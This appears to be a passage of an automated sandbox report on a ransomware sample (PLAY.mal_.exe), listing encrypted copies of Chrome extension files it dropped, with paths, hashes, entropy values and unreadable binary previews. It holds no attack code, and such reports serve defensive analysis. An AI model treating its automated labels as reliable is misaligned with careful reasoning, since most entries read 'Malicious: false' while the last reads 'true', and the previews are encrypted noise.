        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ta\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3016
        Entropy (8bit):7.933034692909487
        Encrypted:false
        SSDEEP:
        MD5:DEF34689504CD28D7165E5D3FC965C9E
        SHA1:8FB274F831EFB322779690AEDFC8E640DE10B0A1
        SHA-256:F9654477685ADD916EEABF28F7B33D272036C7032AF705B3375850C55575C960
        SHA-512:DDBC0C6AEC8EC445D32D4E251A9CB0D0EFFB94CF6FC2BFCA2E1987D2BB9AFB0427D0A233A734148553581DD84E5C556426E1475C82B7DABF3655FC3C1586F26C
        Malicious:false
        Preview:}L.-|..?...l)...j.Z..+...`n.X.s.....%....s?<........%...W...4.H.....Q.....H.../(...=p.<.....*M2...".C.%Vd..*..;C....6..R.....@.U..O.<....*.......ps%2..8.....aM..k.e..d`.p..B)8..].<..[...J..."kre(..i..:.;..\.N.\......C...}....v0#. )..M .H.r[.3....3b .....2.,.2l=~...%Uz.kV...V.../..)...+.]..6:.{...%'IIr2...0.s...a:7.....I.TU..^..f....0x/{l......YZ.I..c..9$....b.TI............+....c.../..O9.:GG..l.Z...!..4.....#.o.[..*..R..1}.E./..i.0...4.......Wd...7.g..+.ug)......-d.... ............Pz.~.....C.T.4=-}...Y.4..v[...P..k....CmJ..._.c..V(.|.~/..>....J.[...%...r..`R...7g.......E.d..UI..Z.......N>8.l....!.......X..../.]2.q..Of"8J.... !.j...>..lg....@.~.L+^mu..$y..(......@.^G9......NJ.....j.p..y"...\;e...g.B.o5....6..b...^.U.JeduIw..M......w.d*..%4y.....p(.f....RS.Mb..g.....cIr.;.%.......m.~.p.a..D*m....-...k>..rz....~."T{v... .......{..._.O_.*.EM.....]8.ou.....H....G\c..byem..Fz..9K.Ws.Sm..*..|0.....EQ....r...VO...4$......MA.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\te\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3064
        Entropy (8bit):7.929335182103116
        Encrypted:false
        SSDEEP:
        MD5:737C8BAF2D9477A9055B478C4B10C557
        SHA1:395154D4D397FF3CF2FA2895AA1FF64DFC0FBEF7
        SHA-256:28C7776BFCE024A513812AC5D8DB0672E60E7B797A88E7F8316FFC609E97D0C7
        SHA-512:5763A1C369E5BF1957F7EC274108BAF640816005C24681A073B0B7771597930FFE93614FECA9DDAF32E7483A35AF8834C4AD81B76AF0C86EDD8C981E3607F45B
        Malicious:false
        Preview:..CZ.....#.s.....w4`y]...._c.._..........!...8\..%(..a.2..d....p....=..>.T....{.<......j...._.=.5..:....@?...#.=..r.O&.Py...Pw`..Z\..UFP..n.:...K.....x2..GSC.p...$...&u..\{H...8.......P..ub.1..K......x2,h#.^.g..g..|.R....!A-.....o..0.Qzk...K.*M.7R_...&.a.`.&...%_hl..`.g....T_.....I...VZ.s....E...l..wR..u........u;.@E3..:.(g..v.a.F.....]...qLq..>..g.D.......c..T.E(#g.a-...5.k.n5N.....{...[......Ij......!..q..4..<.@.#...;<.v.&3x.......DV4V...<...[w...D...R...j....N.\F4|...hJ@.'?..j8-.\.....o...O...PR.v`@..z....5~.....k.....n..H..:..fr~`z../A|...A..A....D...w...1.,..(.8....%V.#^J..#.........yG2k.'/.g2...*.~..... .'...l>..u...K1}r.G)..e<.....'.:.../.u.<'.PTk...I.....4..|7..H...G5JL...d..R`%.liR.0:>..T.t..{-k........?......G..o.. ..s..6...4I2...O...8..l.qRw.1+t......=Eg[.;..P=.i.Z....>!........S...w..q.|.."...G.w{.!o!x:....%'...r...A...W.S..).Sc..o.......S....@3.W.,..Y.............F.......!S.'....Tz.....C.^'~..0..J.@Yv.Oo.a...q....)...&Vx0.........

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\th\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2744
        Entropy (8bit):7.936948416238749
        Encrypted:false
        SSDEEP:
        MD5:33C7D614963C0DCDB6E3158ED4A8EBCC
        SHA1:0729ABD0F4ADE9E9FBC1DA101CE4D48DAC2236DD
        SHA-256:4DCCE215D06A0B9974C3F87D6A37C7E7DD0022101D56882EC628AE9EFC29F1D7
        SHA-512:9105B93B364E0C29D3A0643C7F123BB5979B862DE1486D1AA3D01851B38862C10E82DD74758A9CE086F2A6AF925DE59067428311C398C8D08EEE75C3110DFE59
        Malicious:false
        Preview:Y......1w..q./V........D1....lg..F..!....Y..'....}.J...b'..:....H.:.!..`..$U...).H.Re.{?..1.,...+.....}0w......7W....x...a|FZ.....o.AG.d.R.Xp.)`...;..[t.+.l.....=.6~.+.N^U...*.....<./....3....oR.;h..p......p..$._.i.>..^f./m.Q..U.6,.{gaT..4.V.../......NN...."a...E.."........iz'..*_..cm..,..T.C.K.,E]7o{.=..1.`.........SG...".N.z/y9jT.U|z.E.....p.g.. .....O`,qi...U.fq.......wj.OK.Ll...0!.s...|.P.....P<q8.....M[..-7C..7~)Y6....W.h..wf..^..Nw....*.r..c...Ey...D......X.......K..Y..>.!.B..lj.....O....8.K6....?o..{.k1.:.m*... ~...W9|.l.......zW..%r.M....Q.0vPkb.<.Q..4).l.9..b..wr.4...4...CRu..~........d...7.y.........7.m...].....n.!...~Z.9.P.\..."#...Vw..!,n.-y.Uin..I....<P....>..8fwl..=T.z.>....J.Z.5..........0.$....K}....+.Mb..b.X...]CT^.._...?..B.c d[D).jO........3....qI.R..q.}.zX..V..t.Q0Q.....F.#.Z.......Z.5.......G.:P&....YaNK3......;@...W...@..X..Y.9..:G...+".....\.r.......gb.....HZ-...O2.f4B.aB...j..s..F..J,z.x..;.B..R.k.1sp.oZl.E.DJf.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\tr\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2136
        Entropy (8bit):7.9042627911998755
        Encrypted:false
        SSDEEP:
        MD5:B2B40155E9833CD2E04C5710563FE6A8
        SHA1:0D6E77A7B26392B85F3CA12258624657AD5EA26A
        SHA-256:0402B6BCE1093E2A76EFF1EAC599384B34F84240EC89BF28C7D1C38A47D33BC8
        SHA-512:322C40039C3582A62C25AAE1B11EDE14E5FE9A18ADED1A7F5587BF423B9ABDDB0967E6F03C86A45675AB72C5BAA9213AE8C206AF3A77AA4B49BF95137054D543
        Malicious:false
        Preview:K....4.a.....*.<n_hz.!.y..ne...,.'>..9.n.=......t..U/......[..|..8..,.X.....4.j....Q,..b.<..uhx.$)E..@_.X^}.K..$.(.&.O..L.m+&..G.)..d....O.`.]..E.[&`..u]./.S2.P.4s|g...jcVj..)f...+.E...J...C.....B.C.P.`.og.D.F.=....~p.`.dX..Q4...wN.[.I..............o.!..k....Y.ty3`.&lZ...+..hs..]P..X[..L...#,q.Ec..B...E.=.I..%(.-.P..V~1F..#.t_.).-.......M...j\...^.&....}.."..O....U&*/.X..0zl.:K.E..D.#e...%....{Zx....C.....~.d..f.'..'|?..[W.+....&.......U!....s'.'...c.e{..... .:W.\m.>k;v.E...!(.I..[.h.3T......:.zl..F..../s....lnrr3.hq@p...+........._..=... .06nh.B.9......x.gl..Kz..&....H`V(...,.B..5-g...jB..F.G.J..A...|..>..~.o....N.oQ.nH.k.{Z...2<q].x3.i..%J../..*.J..'Pt......n....Gp.......|.dhP.6.....l.>>z.i.{R.}...IA.5.+!.XD.....%.6k......!'..U.U./..W..U%...,.=.1....0.q.d..C}a...9.[|.Id...R....R$L...R%o..V.:.T.A..T.?R...2.S$.u/{....@F@..$.>./A..a.....|My..]x.Kw..r....... ...:.g.....)%....JlK..z....*.P..Q@5....._.........r@IBFR...d...............<..Yoo..U..

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\uk\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2408
        Entropy (8bit):7.919274431821004
        Encrypted:false
        SSDEEP:
        MD5:F5C6DEAE7F5A7211A0B201A4BA07165B
        SHA1:9EE6D7BAB2F77062A0DD64FBDF38414E8E9BDAE0
        SHA-256:2CE88A266B6E11AFC6F7125DCC9D5B68C66FE798BB1F0ED3CCFC0CF4EEB22994
        SHA-512:92E20A2A7C2FC0CCE9A895D2653C797CFB6F703561585C805215361B938BE02FB893A7AEAA752F35DFEEACD74685E7846ACAC7CFE64DEC4B847AC28E1F503E85
        Malicious:false
        Preview:wU..87..V.$..,...Q.?N3...g.........n5.U....?>#@....Z.../.....~...y.?...W.E.$.....r\.Kz.L..6.z>.?..:.e....\........=...'.h6.h!.R.F.=.r..............5....BH..'......;..c....N..J/..7...F.s.2sAe...[Ent..H.;....b.X.3....0....%.....?.\Sm;.g.{..U...L./w....../..{... .9..2Cb!.1.MW3Z~~.`..<]..D.1..+Z...wH~.~..G..2.H.... ...U..%r..Z.`..}..]}..8.M.e.....:;F}..Cj....{.....,,.b.\....G.E..F..le.!._.z..h<X..z.k..>....^.4.D8.9~5..#..K^na.f.f.Z...........L4...."..4S.....y..-..q_..?.6g.....F..K$M..y.D4.C......W..Hb..Sz......o.k.G8fr.&..\\...X..B/.<D.pg^.....R....5s)..5.K...)..}.....K...MI.<....>.s...%.,.Y.D4..}../.!.B.$..r.0...e...0j...e....D3...G..V..O.K./..s......w*......C.y.|.[....).%5t.e..Y.Q.OH:/].[.?Ir,...=Opa....I@I.....-..&.1...i..]..X.u..?k.bP..~Z...+.2+.v._1..T...}0...).....N..hBliG.........?*#:..D.:..'<.=.[.....K..?x..f..A........Y....L.Jx{.-Da..W/..'n7:f.{.. ..A.&u....~n/?..w....pa^...a....5.V.o!.`c..X}2#.+I.1B.8..V...{C..@<V.1

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ur\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3720
        Entropy (8bit):7.94536669119926
        Encrypted:false
        SSDEEP:
        MD5:6CE10D523ABB3F4A994C694FCBA662D3
        SHA1:88910D76C448C06FDC4375A9DDE0D01DFAC9AC86
        SHA-256:7F6F9104BCD337856889203C2E4F241F26A14B7A511E4014394D79F61E2CE099
        SHA-512:1702002917FD67C683E4C79DA6E3A2137297440AE3B07F2E0DF103393EA42FE2402F585F6A4CB20CAB72FEB3E3751AFB71A36816E1CD5EDBF2FA82BFACD4A3CD
        Malicious:false
        Preview:..#.t.-. .>..E..[.i...s..|.A...\u..5\.Q...a ...n.\..Y..H.Q.I..B..5..[s.@a..O..3....:.;..,h..y....U..+.......-L_~.~.`..9Iq.....0,......c.dl.tO......-<....N..O..+......].@..M.b.\..........x...*1..*G...@....bB.d..s...."T...g(..JV...u..ED..9....Z.....l...S.e.S..N.d.h.>.[..z..M..X....y.*...TU..z.1.E..;.g.6l-~.G~..a..&..Vr..w.A...(ko....F.E#.ni.."...Vi..M[YR....ZL*..,..SS@Dk..rp.............m6.G.p...g....7........"..M.C^z,.?.1..-./....4..O...H..........8{g...:.r..a.@...4.IeY..Y}.;.....RH.nX..=...CN"..T=..eE.II...B.&HE..|.....Y .s...4V3..0..:(?[....,_i...?.r.. D..............y....z.:.n..5.;'...J.3..y...E.g......vx.[7.>x..k...o.......P.U..6."..P...'3..b.'w.7.oQ.Wc..........n.....(nQWx.W...Dc"..4.CT..T...X.y+...a@/j......-_.t....Q7..o:'...gj..t7......ONr6x.lE.]...&.c.-.9<...h..6..z...i.|~....p`s.......[....G..........!;.Og....(_~.......~?.Zd..I..Yc...FZ...F... ...3A"~...;..l. a.~....;.Y.r.>46>...._{..^..h.....M../K..l.l...$.@%.m....4..{...O..H../.J"

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\vi\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2152
        Entropy (8bit):7.9248437106216505
        Encrypted:false
        SSDEEP:
        MD5:8CF60CD2CCCAA61D4ECDC0CD3481A89C
        SHA1:9E5C2312D8A88693DFA72E27136D849D8BE53176
        SHA-256:899B4DE99DA1F484EEFB15F7E638559D93649EF7EED0B5444E5FC1C4EB72750F
        SHA-512:59DF272FF50A83C5EA84EBCD61C8E06BF2762E69DE600AC53C8C1ACC3846BA2BFC7B9FE7770DBD516BF087B157C733BA246CF2A9C58EDE24E81678E9E832EF62
        Malicious:false
        Preview: R..%..p.(..:ii..S......y.}$...U.. g...r.t.9!`......;d....V..%1.S?B..C.....Ev]..-....K..#.7T.>..):y(.N...GG....-f\+......9.s....{....K.*Y_\|.\.Zs{...!.dK....lmR.(.......,-...D.*.?.Ut*.MZ..%,|s..H..r.I..*.W1dT.~(.i.a.p..w.1........VF.4. ^"..Y.z..Sh....6......t.o..7........K<2.q.....).Z.S9...q..w....J8$.P.....8..r.x..).eM..v!L.(.+r.-F....~..L...U.aa.v.u.O..(..;Z...,..T,.KD..-h;G.p..O.Ux0w"..{BF...KJ!..C....WX....E."i.1m..a?.V.&p..J....`;Ji.*...1.....Y...P#....e....-...D.2..N...+.."lb.x...w[.v,.*Z]A._.v...6.m...N$.hPe..W4....+..;....(...@...a...kl...+.l.3s...O.=w..6a&|/..<...t..W<...J..W^+j_.8...m..+.&.?of$g.q...........E..gn..cA.{.o4.J..(.......v6("...l..2..._~l.m...YO.[Q.......[.:h|.vp.FE.`....N..=....1.L.]...Cw..).....6.c/..Md.GU.Z..*%.J..T.l9..g....b#<"3.....`<p..b.:M..&....=mz..G].lq.~...a....0.O...Um.i.s..2$.r._..].K..~S.*o..B...c..]'..{...<..>...V..........e...>!....3wV#..QA\[..".....@.<.EK.T.EXz`<....C.Y {..m.6u.(.(2.4].{.v.H.eRJ|

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\zh_CN\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1944
        Entropy (8bit):7.90733426209899
        Encrypted:false
        SSDEEP:
        MD5:C5DAE7EB7B94558CD9238707CEA1FF2C
        SHA1:F374E66A11AD76998A2B50189A68485F2629322C
        SHA-256:DE044AF3BBABBA35245BD2D0DD4CD11D577B42ED0B2119A2B12DD00435A03A96
        SHA-512:6B57206FD7AC4EA795B88BCB7D525403A15BA3C6EFF5D459571D04A603142DF0FE23A367ADF96376D1304256FB50F95B10BB9AC902EE00A8730BD5ECD436C9B5
        Malicious:false
        Preview:........7.5.A...+...p......CA[......s..-..)."zv=.@.Z....B.l..R..D.j.....U.,.....V....~;wd...=:.D.g$......J...&Fk..T...a.......9{.HC..u.Eo.&.HB.r..k.A.mVw*..o=...H...Q.v....<.*.K8......\x..E.(5...K...k.`Mfc=.....:..zp..y....E.....^t9."........-"..)..|......L.0.6...ta......9Y....M..Q.L.+;%...>...q.Jw%....H.|..g....=.jl.a(S...6..&Z..C$...pw. -%.5&.zC;6i...}*l%3.J..mf....\./......\.C..Y...8..A.]M..!..M...J.p....v..)..l ....(.p9.j`.....|vj..........zd.....hbVa..`._Q.T.!..0.....P*9.^..x.'r.o...V.pO\..Z.......;...ft~*.$'....e.j>38..z.......R..L...Y...h....LOT....?.r..\.1.g...?....J[...u0...N.".....k.O.H.E...A.p>.<..IDpy.=.1Z)....;w.?..{....Z..'...G....rj.E.0.w..-..G....Z....K.K.8.P.~.S.$.!.M.+..-vkq?`..-=...{.BMHol#7.3f......;M.D."U.....#..U....y....-....I.]{F.Q.d!........O.i.....T.nSl"A.<&W...`.7S.N9p...S'. .x%.`..i$U...T..U.|.!.I>..............................e..=W?[...|.}.|h...Z..C .k...1.c.<. ...p.$..Z..X.&.......v.qj...b........

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\zh_HK\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2280
        Entropy (8bit):7.91707782371264
        Encrypted:false
        SSDEEP:
        MD5:A946C55B16CE9637AE7D7D86C0FB4072
        SHA1:998EAE275D9B461D1452E318075BE84031C4A7A8
        SHA-256:9CFAAA1DFAB472C9BBA48967D4CA85076FF1B33645987AFBCD4616EE535B3F3C
        SHA-512:F8D495DBA338D2731E09A8FEEE4533EC7CC866101DF5AEDD0527B2267F783AB9251FFC8A9EC845C4F1FBE1110919287A3690F7071D740B42C253C816493DC4D9
        Malicious:false
        Preview:.d.+..}=..M.?.O........*U......|..[..-X.....j%.......vQ.?......<<.*.g}.....1T...}C.q..6...Y..[..5n.;....B(.@....Ug..hgs{jxF....e...gd.....H@....(B[.P....w.=......."....Lhx...|.6..0..,.`.i...U.@.]U^.gQ....M....u ....v.C..........:.j|l..[|....l.(.A.+.....R..m......U....#....k0.x..*...!,I4;)O...........;...>.....Q.z._j...@.......2..Q.5.6Zh.|...ux...\...:...ft...+...f.h..h:....5.^...v...v?.B7.+z$.V.{..UT..:..'..h.z..W5.H.a>.._Eb...z...`5.sN.b......)....... ?..@.4.g.m$...N..3:.0;.....]..W....J.....H.z.<........p...z..ks2.5........B.$.i..^....S.`.i1KaMQ....6`...n....P./.wwf......9....G.Y..p...;}..r.q..lV..m...bH.._...5....").....=...|z.....".._....J.8A..._..'.7..k<,....O.\.....jsuc2h...u..{.G.:R....Z....2$F..E../.0'.o.../t...8Y.@...<...J..J....!R....K.......U...Nv.E:.'g.tA.....?....$Z.8....`:.. >./,.x.J.M.~..G...c........Y.N.h'eI.,s..P.^....=.Z->Zn.\.F..cc..........6...i......f?...8.t..lj5=."rl...h~;......"J../......q.gp]...'........$....qQ.`.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\zh_TW\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1912
        Entropy (8bit):7.896360578924943
        Encrypted:false
        SSDEEP:
        MD5:39ED890C0D663FD16796E9CBE2E93FE7
        SHA1:50A5C2FE4C3AA311F99CFE590324E5FC4FE4C66C
        SHA-256:F86BB1EB84C7EE9B97F06FEA636A79BAD054C95852C1CBEF9B176452D012A2F6
        SHA-512:3B221369687158847E02CE156539F911B6F2D31C181125670337592B81AF3D136DEE50B4A0DBCF648440E7D6F95ADF7440EA572794B9797FED16D8EEB07A7667
        Malicious:false
        Preview:.GM.s...N..!.....t.......y@.."..s.#....8w.R..n.aF..02.0R0.^G...wE...p.?.bsV.E...D..vY.c.T#ZL...;..Q.x... ..%.\....s.bS}.i.E.......p.Q...,...T..@......h...b.M.D4....|5.A.N..}.e_.!.] J^...N.3r..GVk. ..2.0Z.d>V..$............G,v.S.......4..e.T.TB.7....x.K..lc^.....GL.*q5..*.w*B....g..D...`Y~..5!.O.8...-....x&..\n4..m.De.<...(e......T.-RI\.l.....2N....8..J5al6.....v......../H..#.bg>.0C.l.xx.....a..h...>..9.n...Q..I.+...u>pF..(...?.O=..../.$.4h....%......*..."?....H>..O...f.[HY.0....7......q~...lN\./...,C.#...Ji...{t;.n..T.$...Zi...pT.8..h*...|.!......OzP.....D.A...\..3..z.YAF....$..A.b....B.I.....@.......uyNp9..o(.B.../f.!..W.Th..... .<{.!.A...1.D?g&.X.....H}...x.....#...s.6..8x...^...Xo&.&.,\/..>8.E..\.~...&..........)`.g?J.I$....DJ7.Z..T'..z.1.L.<.fi@N.yN....>.gU..........eri.>..R....,3N...$....."..7 ...T..U.|.!.I>...........................IIw..9-_..p]K...y;S}...y....K.O..L..d.....{f4..b...:2..]-^E...2.....U....&84.7..Au....&..5NP[A\~T...l..

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\zu\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1992
        Entropy (8bit):7.900116059507434
        Encrypted:false
        SSDEEP:
        MD5:5F4E5DF166543DAAD4EBEE6C53292D07
        SHA1:A189361CFD4E09285F6BC7525E1D5947586D6420
        SHA-256:C2715A82F7DE2B507ABBA083B8113028B3AB8909C9DD1305214F808CA8DF7B97
        SHA-512:519484A0BB9EB72B137404ED034B0A479A8AE0F3102D91523261FA948F1174159951BD92C57DC5E26263801215389073F7CF35DE382B1551700D498B722EAE2A
        Malicious:false
        Preview:. '.].V.I#cn.' .X0...Q..PX@/_.#.Z..vIo...Al...E...O8G.N^aV....].....D_..a.p..#...M0M....).r.6$..E1..l.V...._....L......i..i..d..s.S.r..r...\.>*.\..@.....U.-..8Uf.o......[C>......o.A..k;8..........)`...|..d......8...*.h....&...<.n.~:.{.....N.=..o7.m.*.uoXm.6.I.e.H..O.....o*...J..z.....)!...R,9..TG.../.Q..i.........E....%....r........f......x.......s..6..7....6......6..%R.....P"g.........`..%aD....ql..^`w.D.lXLk...d.".N. #..w.r@b?......Y^.@.eZ.'.o.......w. .....5.z...ql.gH..}j.Z.A.dT..._..m.02.me`G..@0.Ms{a..*L.&u.}...U...%:Q.o:..W.H..^LN.g..Q.:......ly.v.......c?..E..8.*..C&k..........{."."..-F.......{.9.7}...+..r..,Ge.....O....2d...7.......M#B..$..~.@%....N..L..d.K.....XEc..._.^.M.{..2H..MjA..|.(...M...O:..)...Ic;..k....GS...hh...LtF..%[(..cg...!.b.g...QU........<.x...r..2*..T_C.....EN.0P..un?.........t......>.X8.e.2V.4.....(.......%.B5.W..&........3.u..../t].F...T..U.|.!.I>..........................!3.@q9M.....?X..4.....x,...b.g.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_metadata\computed_hashes.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4696
        Entropy (8bit):7.9600980035268165
        Encrypted:false
        SSDEEP:
        MD5:A21D9341B951AACEB1828CCBC3CFAE79
        SHA1:99CD917D18C19D1A70C7671B8D33048F01B5D982
        SHA-256:CD67AF2E47F9E6D28640096A41B41970E5289CAF5A7ABEB21E671D77A30900DB
        SHA-512:88A12F496C4286E70AFEAA384ECABE83AE19B114AA61BB8A0F88989BB0764459851A16753CE6ACF81F7DF2851F1A51367EDC0DADBC5E238C3A289A41140C2E87
        Malicious:false
        Preview:.........D.....$..6...j.P&...h^.a[....<aXkc....#kY(..m.iI.c9..Hy..44.......,.D.....N.sg*..r@..^.'...n.Mj....$..P%..d.G.*Y....~....y.H..h.B..m.Y.:...e.DG....O.p..M<...i....]D.WId...n..`.[.i.*.*.=......6.uW!..]......0...........W>..D&..S...z..z....G<Rg".2Y..\.Cg..@.B..@.R..Z7...N.N.~.=..O!..dh....._...`z".:....j..v5.:.....y..D..]j..8}.R%.....:..../..gUH...I.i..^......-D..u.."..8..&.f......t.z}..w.;+.H..Dr..pv.Y.V.....y9..n........Y[..m.....'6.%.)h|....E.{.`Yt.RE....`u.0.(.\.......R.....p....E.qse....X.u...H.]1..K.v.L.kv...E....G.;v."Z9U.3;pL.iT.z.h.?...#h/...<y..t..}..w......U.P.........._......].6N...Q.&.x.._/|..d.......q.}.l#.H.R.y..Z...MW...l.R..c.d.....C|..../.Q..b..%.D*...0GWD..Dj...R.&..x..P....Co.#.2..>.[....].2...WvQ.....qeb.GC..k.L...5.<;.....Ok...n.n..`..c.>sfn.-........S.*...i....>3]......Q.d..%...u.]j.|..S6$[+rc..3,."~..6.-../..~T...5n*...%].w.g.KsSL...E.3.c6~..f......G.u..L.}.......s... 4...;#$G....0.....".j!.N...1.(.P.q.aJ...../.Q.L.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_metadata\verified_contents.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):19368
        Entropy (8bit):7.990888193728898
        Encrypted:true
        SSDEEP:
        MD5:DC5AE393548BAA3E476B7F03056577FA
        SHA1:9FA401311880769469749ADF4BC2C351A2358954
        SHA-256:03A996F8AD9E1A843F859B65F790CE4A8121553CF4228C26484A0DF219306035
        SHA-512:6808BC4FFEA4DA10E3CEFF0E3E6F97E803ADDC5AF83EF0F1868CAF9EA6F72058CB67AE32A4CABB32BF11A120888A978BCF508EF1360FCF224E8E7D2470FE9F66
        Malicious:true
